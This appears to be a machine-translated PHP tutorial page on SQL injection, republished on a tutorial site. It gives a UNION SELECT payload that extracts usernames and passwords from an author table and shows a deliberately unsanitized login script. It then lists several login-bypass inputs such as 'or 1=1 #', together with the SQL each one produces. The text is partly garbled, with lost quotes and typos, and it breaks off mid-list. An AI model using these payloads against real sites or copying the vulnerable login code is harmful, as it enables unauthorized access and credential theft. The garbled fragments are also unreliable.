php injection 2_PHP tutorial

WBOY
Release: 2016-07-13 16:54:24
Original
791 people have browsed it

Let’s build the injection statement
Enter
a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from
alphaauthor# in the input box Put it in the sql statement and become
select * from alphadb where title like %a% and 1=2 union select
1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %
The result is as shown in Figure 17.
How about it, it’s out, haha, everything is under control.
C: Let’s take a look at various injection attack methods from the injection location
1) First let’s take a look at the background login
Code first
//login.php
.. .....
$query="select * from alphaauthor where UserName= "
.$HTTP_POST_VARS["UserName"]." and
Password= ". $HTTP_POST_VARS["Password"]." ";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
echo "Backend login successful";
}
esle
{
echo "log in again";
exit;

.........
?>
Username and password are directly put into SQL for execution without any processing.
Let’s see how we can get around it?
The most classic one is still the one:
Enter
'or =
into both the username and password boxes and bring it into the sql statement to become
select * from alphaauthor where UserName= or = and Password = or =
The $data obtained in this way must be true, which means we have successfully logged in.
There are other bypass methods, the principle is the same, just find a way to make $data return true.
We can use the following methods
1.
Enter both username and password or a = a
Sql becomes
select * from alphaauthor where UserName= or a = a and Password=
or a = a
2.
Enter both username and password or 1=1 and ' =
Sql becomes
select * from alphaauthor where UserName= or 1=1 and ' =
and Password= or 1=1 and ' =
Enter both username and password or 2>1 and ' =
Sql becomes
select * from alphaauthor where UserName= or 2>1 and ' =
and Password= or 2>1 and ' =
3.
Username input or 1=1 # Enter the password as you like
Sql becomes
select * from alphaauthor where UserName = or 1=1 # and
Password= anything The following part of
is commented out, of course the return is still true.
4.

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/631789.htmlTechArticleLet’s build the injection statement. Enter a% and 1=2 union select 1,username,3,4 in the input box. ,5,6,7,8, password,10,11 from alphaauthor# Put it in the sql statement and become select * from alphadb where t...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!